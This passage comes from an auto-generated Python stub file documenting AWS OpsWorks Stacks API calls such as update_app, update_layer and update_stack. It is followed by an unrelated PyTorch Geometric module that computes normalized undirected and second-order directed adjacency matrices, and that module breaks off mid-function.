:example: response = client.stop_instance(
InstanceId='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
"""
pass
def stop_stack(StackId=None):
"""
Stops a specified stack.
See also: AWS API Documentation
:example: response = client.stop_stack(
StackId='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
"""
pass
def unassign_instance(InstanceId=None):
"""
Unassigns a registered instance from all of its layers. The instance remains in the stack as an unassigned instance and can be assigned to another layer, as needed. You cannot use this action with instances that were created with AWS OpsWorks Stacks.
See also: AWS API Documentation
:example: response = client.unassign_instance(
InstanceId='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
"""
pass
def unassign_volume(VolumeId=None):
"""
Unassigns an assigned Amazon EBS volume. The volume remains registered with the stack. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.unassign_volume(
VolumeId='string'
)
:type VolumeId: string
:param VolumeId: [REQUIRED]
The volume ID.
"""
pass
def update_app(AppId=None, Name=None, Description=None, DataSources=None, Type=None, AppSource=None, Domains=None, EnableSsl=None, SslConfiguration=None, Attributes=None, Environment=None):
"""
Updates a specified app.
See also: AWS API Documentation
:example: response = client.update_app(
AppId='string',
Name='string',
Description='string',
DataSources=[
{
'Type': 'string',
'Arn': 'string',
'DatabaseName': 'string'
},
],
Type='aws-flow-ruby'|'java'|'rails'|'php'|'nodejs'|'static'|'other',
AppSource={
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
Domains=[
'string',
],
EnableSsl=True|False,
SslConfiguration={
'Certificate': 'string',
'PrivateKey': 'string',
'Chain': 'string'
},
Attributes={
'string': 'string'
},
Environment=[
{
'Key': 'string',
'Value': 'string',
'Secure': True|False
},
]
)
:type AppId: string
:param AppId: [REQUIRED]
The app ID.
:type Name: string
:param Name: The app name.
:type Description: string
:param Description: A description of the app.
:type DataSources: list
:param DataSources: The app's data sources.
(dict) --Describes an app's data source.
Type (string) --The data source's type, AutoSelectOpsworksMysqlInstance , OpsworksMysqlInstance , or RdsDbInstance .
Arn (string) --The data source's ARN.
DatabaseName (string) --The database name.
:type Type: string
:param Type: The app type.
:type AppSource: dict
:param AppSource: A Source object that specifies the app repository.
Type (string) --The repository type.
Url (string) --The source URL.
Username (string) --This parameter depends on the repository type.
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
Password (string) --When included in a request, the parameter depends on the repository type.
For Amazon S3 bundles, set Password to the appropriate IAM secret access key.
For HTTP bundles and Subversion repositories, set Password to the password.
For more information on how to safely handle IAM credentials, see http://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html .
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
SshKey (string) --In requests, the repository's SSH key.
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
Revision (string) --The application's version. AWS OpsWorks Stacks enables you to easily deploy new versions of an application. One of the simplest approaches is to have branches or revisions in your repository that represent different versions that can potentially be deployed.
:type Domains: list
:param Domains: The app's virtual host settings, with multiple domains separated by commas. For example: 'www.example.com, example.com'
(string) --
:type EnableSsl: boolean
:param EnableSsl: Whether SSL is enabled for the app.
:type SslConfiguration: dict
:param SslConfiguration: An SslConfiguration object with the SSL configuration.
Certificate (string) -- [REQUIRED]The contents of the certificate's domain.crt file.
PrivateKey (string) -- [REQUIRED]The private key; the contents of the certificate's domain.key file.
Chain (string) --Optional. Can be used to specify an intermediate certificate authority key or client authentication.
:type Attributes: dict
:param Attributes: One or more user-defined key/value pairs to be added to the stack attributes.
(string) --
(string) --
:type Environment: list
:param Environment: An array of EnvironmentVariable objects that specify environment variables to be associated with the app. After you deploy the app, these variables are defined on the associated app server instances.For more information, see Environment Variables .
There is no specific limit on the number of environment variables. However, the size of the associated data structure - which includes the variables' names, values, and protected flag values - cannot exceed 10 KB (10240 Bytes). This limit should accommodate most if not all use cases. Exceeding it will cause an exception with the message, 'Environment: is too large (maximum is 10KB).'
Note
This parameter is supported only by Chef 11.10 stacks. If you have specified one or more environment variables, you cannot modify the stack's Chef version.
(dict) --Represents an app's environment variable.
Key (string) -- [REQUIRED](Required) The environment variable's name, which can consist of up to 64 characters and must be specified. The name can contain upper- and lowercase letters, numbers, and underscores (_), but it must start with a letter or underscore.
Value (string) -- [REQUIRED](Optional) The environment variable's value, which can be left empty. If you specify a value, it can contain up to 256 characters, which must all be printable.
Secure (boolean) --(Optional) Whether the variable's value will be returned by the DescribeApps action. To conceal an environment variable's value, set Secure to true . DescribeApps then returns *****FILTERED***** instead of the actual value. The default value for Secure is false .
"""
pass
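The Environment parameter above carries a documented 10 KB (10240-byte) limit on the combined names, values, and Secure flags. A sketch that assembles the entries and approximates that check before the call (the byte accounting here is an estimate, not the service's exact formula, and the variable names are placeholders):

```python
# Sketch: build Environment entries for update_app and guard the
# documented 10 KB limit. The size estimate is an approximation of
# the combined names, values, and Secure flags.
def env_var(key, value, secure=False):
    return {'Key': key, 'Value': value, 'Secure': secure}

def check_environment_size(environment, limit=10240):
    size = sum(len(v['Key']) + len(v['Value']) + 1 for v in environment)
    if size > limit:
        raise ValueError('Environment: is too large (maximum is 10KB)')
    return environment

env = check_environment_size([
    env_var('RAILS_ENV', 'production'),
    env_var('DB_PASSWORD', 's3cret', secure=True),  # masked by DescribeApps
])
# client.update_app(AppId='app-id', Environment=env)
```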
def update_elastic_ip(ElasticIp=None, Name=None):
"""
Updates a registered Elastic IP address's name. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.update_elastic_ip(
ElasticIp='string',
Name='string'
)
:type ElasticIp: string
:param ElasticIp: [REQUIRED]
The address.
:type Name: string
:param Name: The new name.
"""
pass
def update_instance(InstanceId=None, LayerIds=None, InstanceType=None, AutoScalingType=None, Hostname=None, Os=None, AmiId=None, SshKeyName=None, Architecture=None, InstallUpdatesOnBoot=None, EbsOptimized=None, AgentVersion=None):
"""
Updates a specified instance.
See also: AWS API Documentation
:example: response = client.update_instance(
InstanceId='string',
LayerIds=[
'string',
],
InstanceType='string',
AutoScalingType='load'|'timer',
Hostname='string',
Os='string',
AmiId='string',
SshKeyName='string',
Architecture='x86_64'|'i386',
InstallUpdatesOnBoot=True|False,
EbsOptimized=True|False,
AgentVersion='string'
)
:type InstanceId: string
:param InstanceId: [REQUIRED]
The instance ID.
:type LayerIds: list
:param LayerIds: The instance's layer IDs.
(string) --
:type InstanceType: string
:param InstanceType: The instance type, such as t2.micro . For a list of supported instance types, open the stack in the console, choose Instances , and choose + Instance . The Size list contains the currently supported types. For more information, see Instance Families and Types . The parameter values that you use to specify the various types are in the API Name column of the Available Instance Types table.
:type AutoScalingType: string
:param AutoScalingType: For load-based or time-based instances, the type. Windows stacks can use only time-based instances.
:type Hostname: string
:param Hostname: The instance host name.
:type Os: string
:param Os: The instance's operating system, which must be set to one of the following. You cannot update an instance that is using a custom AMI.
A supported Linux operating system: An Amazon Linux version, such as Amazon Linux 2016.09 , Amazon Linux 2016.03 , Amazon Linux 2015.09 , or Amazon Linux 2015.03 .
A supported Ubuntu operating system, such as Ubuntu 16.04 LTS , Ubuntu 14.04 LTS , or Ubuntu 12.04 LTS .
CentOS Linux 7
Red Hat Enterprise Linux 7
A supported Windows operating system, such as Microsoft Windows Server 2012 R2 Base , Microsoft Windows Server 2012 R2 with SQL Server Express , Microsoft Windows Server 2012 R2 with SQL Server Standard , or Microsoft Windows Server 2012 R2 with SQL Server Web .
For more information on the supported operating systems, see AWS OpsWorks Stacks Operating Systems .
The default option is the current Amazon Linux version. If you set this parameter to Custom , you must use the AmiId parameter to specify the custom AMI that you want to use. For more information on the supported operating systems, see Operating Systems . For more information on how to use custom AMIs with OpsWorks, see Using Custom AMIs .
Note
You can specify a different Linux operating system for the updated stack, but you cannot change from Linux to Windows or Windows to Linux.
:type AmiId: string
:param AmiId: The ID of the AMI that was used to create the instance. The value of this parameter must be the same AMI ID that the instance is already using. You cannot apply a new AMI to an instance by running UpdateInstance. UpdateInstance does not work on instances that are using custom AMIs.
:type SshKeyName: string
:param SshKeyName: The instance's Amazon EC2 key name.
:type Architecture: string
:param Architecture: The instance architecture. Instance types do not necessarily support both architectures. For a list of the architectures that are supported by the different instance types, see Instance Families and Types .
:type InstallUpdatesOnBoot: boolean
:param InstallUpdatesOnBoot: Whether to install operating system and package updates when the instance boots. The default value is true . To control when updates are installed, set this value to false . You must then update your instances manually by using CreateDeployment to run the update_dependencies stack command or by manually running yum (Amazon Linux) or apt-get (Ubuntu) on the instances.
Note
We strongly recommend using the default value of true , to ensure that your instances have the latest security updates.
:type EbsOptimized: boolean
:param EbsOptimized: This property cannot be updated.
:type AgentVersion: string
:param AgentVersion: The default AWS OpsWorks Stacks agent version. You have the following options:
INHERIT - Use the stack's default agent version setting.
version_number - Use the specified agent version. This value overrides the stack's default setting. To update the agent version, you must edit the instance configuration and specify a new version. AWS OpsWorks Stacks then automatically installs that version on the instance.
The default setting is INHERIT . To specify an agent version, you must use the complete version number, not the abbreviated number shown on the console. For a list of available agent version numbers, call DescribeAgentVersions .
AgentVersion cannot be set to Chef 12.2.
"""
pass
def update_layer(LayerId=None, Name=None, Shortname=None, Attributes=None, CloudWatchLogsConfiguration=None, CustomInstanceProfileArn=None, CustomJson=None, CustomSecurityGroupIds=None, Packages=None, VolumeConfigurations=None, EnableAutoHealing=None, AutoAssignElasticIps=None, AutoAssignPublicIps=None, CustomRecipes=None, InstallUpdatesOnBoot=None, UseEbsOptimizedInstances=None, LifecycleEventConfiguration=None):
"""
Updates a specified layer.
See also: AWS API Documentation
:example: response = client.update_layer(
LayerId='string',
Name='string',
Shortname='string',
Attributes={
'string': 'string'
},
CloudWatchLogsConfiguration={
'Enabled': True|False,
'LogStreams': [
{
'LogGroupName': 'string',
'DatetimeFormat': 'string',
'TimeZone': 'LOCAL'|'UTC',
'File': 'string',
'FileFingerprintLines': 'string',
'MultiLineStartPattern': 'string',
'InitialPosition': 'start_of_file'|'end_of_file',
'Encoding': 'ascii'|'big5'|'big5hkscs'|'cp037'|'cp424'|'cp437'|'cp500'|'cp720'|'cp737'|'cp775'|'cp850'|'cp852'|'cp855'|'cp856'|'cp857'|'cp858'|'cp860'|'cp861'|'cp862'|'cp863'|'cp864'|'cp865'|'cp866'|'cp869'|'cp874'|'cp875'|'cp932'|'cp949'|'cp950'|'cp1006'|'cp1026'|'cp1140'|'cp1250'|'cp1251'|'cp1252'|'cp1253'|'cp1254'|'cp1255'|'cp1256'|'cp1257'|'cp1258'|'euc_jp'|'euc_jis_2004'|'euc_jisx0213'|'euc_kr'|'gb2312'|'gbk'|'gb18030'|'hz'|'iso2022_jp'|'iso2022_jp_1'|'iso2022_jp_2'|'iso2022_jp_2004'|'iso2022_jp_3'|'iso2022_jp_ext'|'iso2022_kr'|'latin_1'|'iso8859_2'|'iso8859_3'|'iso8859_4'|'iso8859_5'|'iso8859_6'|'iso8859_7'|'iso8859_8'|'iso8859_9'|'iso8859_10'|'iso8859_13'|'iso8859_14'|'iso8859_15'|'iso8859_16'|'johab'|'koi8_r'|'koi8_u'|'mac_cyrillic'|'mac_greek'|'mac_iceland'|'mac_latin2'|'mac_roman'|'mac_turkish'|'ptcp154'|'shift_jis'|'shift_jis_2004'|'shift_jisx0213'|'utf_32'|'utf_32_be'|'utf_32_le'|'utf_16'|'utf_16_be'|'utf_16_le'|'utf_7'|'utf_8'|'utf_8_sig',
'BufferDuration': 123,
'BatchCount': 123,
'BatchSize': 123
},
]
},
CustomInstanceProfileArn='string',
CustomJson='string',
CustomSecurityGroupIds=[
'string',
],
Packages=[
'string',
],
VolumeConfigurations=[
{
'MountPoint': 'string',
'RaidLevel': 123,
'NumberOfDisks': 123,
'Size': 123,
'VolumeType': 'string',
'Iops': 123
},
],
EnableAutoHealing=True|False,
AutoAssignElasticIps=True|False,
AutoAssignPublicIps=True|False,
CustomRecipes={
'Setup': [
'string',
],
'Configure': [
'string',
],
'Deploy': [
'string',
],
'Undeploy': [
'string',
],
'Shutdown': [
'string',
]
},
InstallUpdatesOnBoot=True|False,
UseEbsOptimizedInstances=True|False,
LifecycleEventConfiguration={
'Shutdown': {
'ExecutionTimeout': 123,
'DelayUntilElbConnectionsDrained': True|False
}
}
)
:type LayerId: string
:param LayerId: [REQUIRED]
The layer ID.
:type Name: string
:param Name: The layer name, which is used by the console.
:type Shortname: string
:param Shortname: For custom layers only, use this parameter to specify the layer's short name, which is used internally by AWS OpsWorks Stacks and by Chef. The short name is also used as the name for the directory where your app files are installed. It can have a maximum of 200 characters and must be in the following format: /A[a-z0-9-_.]+Z/.
The built-in layers' short names are defined by AWS OpsWorks Stacks. For more information, see the Layer Reference .
:type Attributes: dict
:param Attributes: One or more user-defined key/value pairs to be added to the stack attributes.
(string) --
(string) --
:type CloudWatchLogsConfiguration: dict
:param CloudWatchLogsConfiguration: Specifies CloudWatch Logs configuration options for the layer. For more information, see CloudWatchLogsLogStream .
Enabled (boolean) --Whether CloudWatch Logs is enabled for a layer.
LogStreams (list) --A list of configuration options for CloudWatch Logs.
(dict) --Describes the Amazon CloudWatch logs configuration for a layer. For detailed information about members of this data type, see the CloudWatch Logs Agent Reference .
LogGroupName (string) --Specifies the destination log group. A log group is created automatically if it doesn't already exist. Log group names can be between 1 and 512 characters long. Allowed characters include a-z, A-Z, 0-9, '_' (underscore), '-' (hyphen), '/' (forward slash), and '.' (period).
DatetimeFormat (string) --Specifies how the time stamp is extracted from logs. For more information, see the CloudWatch Logs Agent Reference .
TimeZone (string) --Specifies the time zone of log event time stamps.
File (string) --Specifies log files that you want to push to CloudWatch Logs.
File can point to a specific file or multiple files (by using wild card characters such as /var/log/system.log* ). Only the latest file is pushed to CloudWatch Logs, based on file modification time. We recommend that you use wild card characters to specify a series of files of the same type, such as access_log.2014-06-01-01 , access_log.2014-06-01-02 , and so on by using a pattern like access_log.* . Don't use a wildcard to match multiple file types, such as access_log_80 and access_log_443 . To specify multiple, different file types, add another log stream entry to the configuration file, so that each log file type is stored in a different log group.
Zipped files are not supported.
FileFingerprintLines (string) --Specifies the range of lines for identifying a file. The valid values are one number, or two dash-delimited numbers, such as '1', '2-5'. The default value is '1', meaning the first line is used to calculate the fingerprint. Fingerprint lines are not sent to CloudWatch Logs unless all specified lines are available.
MultiLineStartPattern (string) --Specifies the pattern for identifying the start of a log message.
InitialPosition (string) --Specifies where to start to read data (start_of_file or end_of_file). The default is start_of_file. This setting is only used if there is no state persisted for that log stream.
Encoding (string) --Specifies the encoding of the log file so that the file can be read correctly. The default is utf_8 . Encodings supported by Python codecs.decode() can be used here.
BufferDuration (integer) --Specifies the time duration for the batching of log events. The minimum value is 5000ms and default value is 5000ms.
BatchCount (integer) --Specifies the max number of log events in a batch, up to 10000. The default value is 1000.
BatchSize (integer) --Specifies the maximum size of log events in a batch, in bytes, up to 1048576 bytes. The default value is 32768 bytes. This size is calculated as the sum of all event messages in UTF-8, plus 26 bytes for each log event.
:type CustomInstanceProfileArn: string
:param CustomInstanceProfileArn: The ARN of an IAM profile to be used for all of the layer's EC2 instances. For more information about IAM ARNs, see Using Identifiers .
:type CustomJson: string
:param CustomJson: A JSON-formatted string containing custom stack configuration and deployment attributes to be installed on the layer's instances. For more information, see Using Custom JSON .
:type CustomSecurityGroupIds: list
:param CustomSecurityGroupIds: An array containing the layer's custom security group IDs.
(string) --
:type Packages: list
:param Packages: An array of Package objects that describe the layer's packages.
(string) --
:type VolumeConfigurations: list
:param VolumeConfigurations: A VolumeConfigurations object that describes the layer's Amazon EBS volumes.
(dict) --Describes an Amazon EBS volume configuration.
MountPoint (string) -- [REQUIRED]The volume mount point. For example '/dev/sdh'.
RaidLevel (integer) --The volume RAID level .
NumberOfDisks (integer) -- [REQUIRED]The number of disks in the volume.
Size (integer) -- [REQUIRED]The volume size.
VolumeType (string) --The volume type:
standard - Magnetic
io1 - Provisioned IOPS (SSD)
gp2 - General Purpose (SSD)
Iops (integer) --For PIOPS volumes, the IOPS per disk.
:type EnableAutoHealing: boolean
:param EnableAutoHealing: Whether to enable auto healing for the layer's instances.
:type AutoAssignElasticIps: boolean
:param AutoAssignElasticIps: Whether to automatically assign an Elastic IP address to the layer's instances. For more information, see How to Edit a Layer .
:type AutoAssignPublicIps: boolean
:param AutoAssignPublicIps: For stacks that are running in a VPC, whether to automatically assign a public IP address to the layer's instances. For more information, see How to Edit a Layer .
:type CustomRecipes: dict
:param CustomRecipes: A LayerCustomRecipes object that specifies the layer's custom recipes.
Setup (list) --An array of custom recipe names to be run following a setup event.
(string) --
Configure (list) --An array of custom recipe names to be run following a configure event.
(string) --
Deploy (list) --An array of custom recipe names to be run following a deploy event.
(string) --
Undeploy (list) --An array of custom recipe names to be run following an undeploy event.
(string) --
Shutdown (list) --An array of custom recipe names to be run following a shutdown event.
(string) --
:type InstallUpdatesOnBoot: boolean
:param InstallUpdatesOnBoot: Whether to install operating system and package updates when the instance boots. The default value is true . To control when updates are installed, set this value to false . You must then update your instances manually by using CreateDeployment to run the update_dependencies stack command or manually running yum (Amazon Linux) or apt-get (Ubuntu) on the instances.
Note
We strongly recommend using the default value of true , to ensure that your instances have the latest security updates.
:type UseEbsOptimizedInstances: boolean
:param UseEbsOptimizedInstances: Whether to use Amazon EBS-optimized instances.
:type LifecycleEventConfiguration: dict
:param LifecycleEventConfiguration:
Shutdown (dict) --A ShutdownEventConfiguration object that specifies the Shutdown event configuration.
ExecutionTimeout (integer) --The time, in seconds, that AWS OpsWorks Stacks will wait after triggering a Shutdown event before shutting down an instance.
DelayUntilElbConnectionsDrained (boolean) --Whether to enable Elastic Load Balancing connection draining. For more information, see Connection Draining
"""
pass
def update_my_user_profile(SshPublicKey=None):
"""
Updates a user's SSH public key.
See also: AWS API Documentation
:example: response = client.update_my_user_profile(
SshPublicKey='string'
)
:type SshPublicKey: string
:param SshPublicKey: The user's SSH public key.
"""
pass
def update_rds_db_instance(RdsDbInstanceArn=None, DbUser=None, DbPassword=None):
"""
Updates an Amazon RDS instance.
See also: AWS API Documentation
:example: response = client.update_rds_db_instance(
RdsDbInstanceArn='string',
DbUser='string',
DbPassword='string'
)
:type RdsDbInstanceArn: string
:param RdsDbInstanceArn: [REQUIRED]
The Amazon RDS instance's ARN.
:type DbUser: string
:param DbUser: The master user name.
:type DbPassword: string
:param DbPassword: The database password.
"""
pass
def update_stack(StackId=None, Name=None, Attributes=None, ServiceRoleArn=None, DefaultInstanceProfileArn=None, DefaultOs=None, HostnameTheme=None, DefaultAvailabilityZone=None, DefaultSubnetId=None, CustomJson=None, ConfigurationManager=None, ChefConfiguration=None, UseCustomCookbooks=None, CustomCookbooksSource=None, DefaultSshKeyName=None, DefaultRootDeviceType=None, UseOpsworksSecurityGroups=None, AgentVersion=None):
"""
Updates a specified stack.
See also: AWS API Documentation
:example: response = client.update_stack(
StackId='string',
Name='string',
Attributes={
'string': 'string'
},
ServiceRoleArn='string',
DefaultInstanceProfileArn='string',
DefaultOs='string',
HostnameTheme='string',
DefaultAvailabilityZone='string',
DefaultSubnetId='string',
CustomJson='string',
ConfigurationManager={
'Name': 'string',
'Version': 'string'
},
ChefConfiguration={
'ManageBerkshelf': True|False,
'BerkshelfVersion': 'string'
},
UseCustomCookbooks=True|False,
CustomCookbooksSource={
'Type': 'git'|'svn'|'archive'|'s3',
'Url': 'string',
'Username': 'string',
'Password': 'string',
'SshKey': 'string',
'Revision': 'string'
},
DefaultSshKeyName='string',
DefaultRootDeviceType='ebs'|'instance-store',
UseOpsworksSecurityGroups=True|False,
AgentVersion='string'
)
:type StackId: string
:param StackId: [REQUIRED]
The stack ID.
:type Name: string
:param Name: The stack's new name.
:type Attributes: dict
:param Attributes: One or more user-defined key-value pairs to be added to the stack attributes.
(string) --
(string) --
:type ServiceRoleArn: string
:param ServiceRoleArn: Do not use this parameter. You cannot update a stack's service role.
:type DefaultInstanceProfileArn: string
:param DefaultInstanceProfileArn: The ARN of an IAM profile that is the default profile for all of the stack's EC2 instances. For more information about IAM ARNs, see Using Identifiers .
:type DefaultOs: string
:param DefaultOs: The stack's operating system, which must be set to one of the following:
A supported Linux operating system: An Amazon Linux version, such as Amazon Linux 2016.09 , Amazon Linux 2016.03 , Amazon Linux 2015.09 , or Amazon Linux 2015.03 .
A supported Ubuntu operating system, such as Ubuntu 16.04 LTS , Ubuntu 14.04 LTS , or Ubuntu 12.04 LTS .
CentOS Linux 7
Red Hat Enterprise Linux 7
A supported Windows operating system, such as Microsoft Windows Server 2012 R2 Base , Microsoft Windows Server 2012 R2 with SQL Server Express , Microsoft Windows Server 2012 R2 with SQL Server Standard , or Microsoft Windows Server 2012 R2 with SQL Server Web .
A custom AMI: Custom . You specify the custom AMI you want to use when you create instances. For more information on how to use custom AMIs with OpsWorks, see Using Custom AMIs .
The default option is the stack's current operating system. For more information on the supported operating systems, see AWS OpsWorks Stacks Operating Systems .
:type HostnameTheme: string
:param HostnameTheme: The stack's new host name theme, with spaces replaced by underscores. The theme is used to generate host names for the stack's instances. By default, HostnameTheme is set to Layer_Dependent , which creates host names by appending integers to the layer's short name. The other themes are:
Baked_Goods
Clouds
Europe_Cities
Fruits
Greek_Deities
Legendary_creatures_from_Japan
Planets_and_Moons
Roman_Deities
Scottish_Islands
US_Cities
Wild_Cats
To obtain a generated host name, call GetHostNameSuggestion , which returns a host name based on the current theme.
:type DefaultAvailabilityZone: string
:param DefaultAvailabilityZone: The stack's default Availability Zone, which must be in the stack's region. For more information, see Regions and Endpoints . If you also specify a value for DefaultSubnetId , the subnet must be in the same zone. For more information, see CreateStack .
:type DefaultSubnetId: string
:param DefaultSubnetId: The stack's default VPC subnet ID. This parameter is required if you specify a value for the VpcId parameter. All instances are launched into this subnet unless you specify otherwise when you create the instance. If you also specify a value for DefaultAvailabilityZone , the subnet must be in that zone. For information on default values and when this parameter is required, see the VpcId parameter description.
:type CustomJson: string
:param CustomJson: A string that contains user-defined, custom JSON. It can be used to override the corresponding default stack configuration JSON values or to pass data to recipes. The string should be in the following format:
'{\'key1\': \'value1\', \'key2\': \'value2\',...}'
For more information on custom JSON, see Use Custom JSON to Modify the Stack Configuration Attributes .
:type ConfigurationManager: dict
:param ConfigurationManager: The configuration manager. When you update a stack, we recommend that you use the configuration manager to specify the Chef version: 12, 11.10, or 11.4 for Linux stacks, or 12.2 for Windows stacks. The default value for Linux stacks is currently 11.4.
Name (string) --The name. This parameter must be set to 'Chef'.
Version (string) --The Chef version. This parameter must be set to 12, 11.10, or 11.4 for Linux stacks, and to 12.2 for Windows stacks. The default value for Linux stacks is 11.4.
:type ChefConfiguration: dict
:param ChefConfiguration: A ChefConfiguration object that specifies whether to enable Berkshelf and the Berkshelf version on Chef 11.10 stacks. For more information, see Create a New Stack .
ManageBerkshelf (boolean) --Whether to enable Berkshelf.
BerkshelfVersion (string) --The Berkshelf version.
:type UseCustomCookbooks: boolean
:param UseCustomCookbooks: Whether the stack uses custom cookbooks.
:type CustomCookbooksSource: dict
:param CustomCookbooksSource: Contains the information required to retrieve an app or cookbook from a repository. For more information, see Creating Apps or Custom Recipes and Cookbooks .
Type (string) --The repository type.
Url (string) --The source URL.
Username (string) --This parameter depends on the repository type.
For Amazon S3 bundles, set Username to the appropriate IAM access key ID.
For HTTP bundles, Git repositories, and Subversion repositories, set Username to the user name.
Password (string) --When included in a request, the parameter depends on the repository type.
For Amazon S3 bundles, set Password to the appropriate IAM secret access key.
For HTTP bundles and Subversion repositories, set Password to the password.
For more information on how to safely handle IAM credentials, see http://docs.aws.amazon.com/general/latest/gr/aws-access-keys-best-practices.html .
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
SshKey (string) --In requests, the repository's SSH key.
In responses, AWS OpsWorks Stacks returns *****FILTERED***** instead of the actual value.
Revision (string) --The application's version. AWS OpsWorks Stacks enables you to easily deploy new versions of an application. One of the simplest approaches is to have branches or revisions in your repository that represent different versions that can potentially be deployed.
:type DefaultSshKeyName: string
:param DefaultSshKeyName: A default Amazon EC2 key-pair name. The default value is none . If you specify a key-pair name, AWS OpsWorks Stacks installs the public key on the instance and you can use the private key with an SSH client to log in to the instance. For more information, see Using SSH to Communicate with an Instance and Managing SSH Access . You can override this setting by specifying a different key pair, or no key pair, when you create an instance .
:type DefaultRootDeviceType: string
:param DefaultRootDeviceType: The default root device type. This value is used by default for all instances in the stack, but you can override it when you create an instance. For more information, see Storage for the Root Device .
:type UseOpsworksSecurityGroups: boolean
:param UseOpsworksSecurityGroups: Whether to associate the AWS OpsWorks Stacks built-in security groups with the stack's layers.
AWS OpsWorks Stacks provides a standard set of built-in security groups, one for each layer, which are associated with layers by default. UseOpsworksSecurityGroups allows you to provide your own custom security groups instead of using the built-in groups. UseOpsworksSecurityGroups has the following settings:
True - AWS OpsWorks Stacks automatically associates the appropriate built-in security group with each layer (default setting). You can associate additional security groups with a layer after you create it, but you cannot delete the built-in security group.
False - AWS OpsWorks Stacks does not associate built-in security groups with layers. You must create appropriate EC2 security groups and associate a security group with each layer that you create. However, you can still manually associate a built-in security group with a layer on creation. Custom security groups are required only for those layers that need custom settings.
For more information, see Create a New Stack .
:type AgentVersion: string
:param AgentVersion: The default AWS OpsWorks Stacks agent version. You have the following options:
Auto-update - Set this parameter to LATEST . AWS OpsWorks Stacks automatically installs new agent versions on the stack's instances as soon as they are available.
Fixed version - Set this parameter to your preferred agent version. To update the agent version, you must edit the stack configuration and specify a new version. AWS OpsWorks Stacks then automatically installs that version on the stack's instances.
The default setting is LATEST . To specify an agent version, you must use the complete version number, not the abbreviated number shown on the console. For a list of available agent version numbers, call DescribeAgentVersions . AgentVersion cannot be set to Chef 12.2.
Note
You can also specify an agent version when you create or update an instance, which overrides the stack's default setting.
"""
pass
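The docstring above shows `CustomJson` as a hand-escaped string. A straightforward way to build a valid value is `json.dumps` (illustrative sketch; `stack_overrides` is a made-up payload, not part of the generated stub):

```python
import json

# Build the JSON-encoded string that update_stack's CustomJson parameter expects,
# instead of hand-escaping quotes as in the docstring example.
stack_overrides = {"key1": "value1", "key2": "value2"}
custom_json = json.dumps(stack_overrides)
# custom_json can then be passed as CustomJson=custom_json
```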
def update_user_profile(IamUserArn=None, SshUsername=None, SshPublicKey=None, AllowSelfManagement=None):
"""
Updates a specified user profile.
See also: AWS API Documentation
:example: response = client.update_user_profile(
IamUserArn='string',
SshUsername='string',
SshPublicKey='string',
AllowSelfManagement=True|False
)
:type IamUserArn: string
:param IamUserArn: [REQUIRED]
The user IAM ARN. This can also be a federated user's ARN.
:type SshUsername: string
:param SshUsername: The user's SSH user name. The allowable characters are [a-z], [A-Z], [0-9], '-', and '_'. If the specified name includes other punctuation marks, AWS OpsWorks Stacks removes them. For example, my.name will be changed to myname . If you do not specify an SSH user name, AWS OpsWorks Stacks generates one from the IAM user name.
:type SshPublicKey: string
:param SshPublicKey: The user's new SSH public key.
:type AllowSelfManagement: boolean
:param AllowSelfManagement: Whether users can specify their own SSH public key through the My Settings page. For more information, see Managing User Permissions .
"""
pass
def update_volume(VolumeId=None, Name=None, MountPoint=None):
"""
Updates an Amazon EBS volume's name or mount point. For more information, see Resource Management .
See also: AWS API Documentation
:example: response = client.update_volume(
VolumeId='string',
Name='string',
MountPoint='string'
)
:type VolumeId: string
:param VolumeId: [REQUIRED]
The volume ID.
:type Name: string
:param Name: The new name.
:type MountPoint: string
:param MountPoint: The new mount point.
"""
pass
# File: code/get_adj.py (repo: xjy912/DGMP-1, license: MIT)
import torch
from torch_geometric.utils import add_self_loops
from torch_scatter import scatter_add
def get_undirected_adj(edge_index, num_nodes, dtype):
    """Add self-loops and return GCN-style weights D^-1/2 (A + I) D^-1/2."""
edge_weight = torch.ones((edge_index.size(1), ), dtype=dtype,
device=edge_index.device)
fill_value = 1
edge_index, edge_weight = add_self_loops(
edge_index, edge_weight, fill_value, num_nodes)
row, col = edge_index
deg = scatter_add(edge_weight, row, dim=0, dim_size=num_nodes)
deg_inv_sqrt = deg.pow(-0.5)
deg_inv_sqrt[deg_inv_sqrt == float('inf')] = 0
return edge_index, deg_inv_sqrt[row] * edge_weight * deg_inv_sqrt[col]
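The weights returned above implement the GCN-style symmetric normalization D^-1/2 (A + I) D^-1/2. A dependency-free sanity check of the same arithmetic on a toy 3-node path graph (pure-Python stand-in, not part of the original module):

```python
import math

# Path graph 0-1-2 (undirected) with self-loops already added (fill_value = 1):
A = [[1, 1, 0],
     [1, 1, 1],
     [0, 1, 1]]
deg = [sum(row) for row in A]  # degrees including self-loops
# Symmetric normalization D^-1/2 (A + I) D^-1/2, matching the returned edge weights.
norm = [[A[i][j] / math.sqrt(deg[i] * deg[j]) for j in range(3)] for i in range(3)]
```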
def get_in_directed_adj(edge_index, num_nodes, dtype):
    """Second-order adjacency L = P^T P, where P is the out-degree-normalized
    transition matrix: two nodes are linked when a common node points to both.
    L is then symmetrically normalized."""
edge_weight = torch.ones((edge_index.size(1), ), dtype=dtype,
device=edge_index.device)
fill_value = 1
edge_index, edge_weight = add_self_loops(
edge_index, edge_weight, fill_value, num_nodes)
row, col = edge_index
deg = scatter_add(edge_weight, row, dim=0, dim_size=num_nodes)
deg_inv = deg.pow(-1)
deg_inv[deg_inv == float('inf')] = 0
p = deg_inv[row] * edge_weight
p_dense = torch.sparse.FloatTensor(edge_index, p, torch.Size([num_nodes,num_nodes])).to_dense()
L = torch.mm(p_dense.t(), p_dense)
    # replace NaN entries with 0
    L[torch.isnan(L)] = 0
    # convert the dense matrix L back to sparse edge_index / edge_weight form
L_indices = torch.nonzero(L,as_tuple=False).t()
L_values = L[L_indices[0], L_indices[1]]
edge_index = L_indices
edge_weight = L_values
    # symmetric normalization of the second-order matrix L
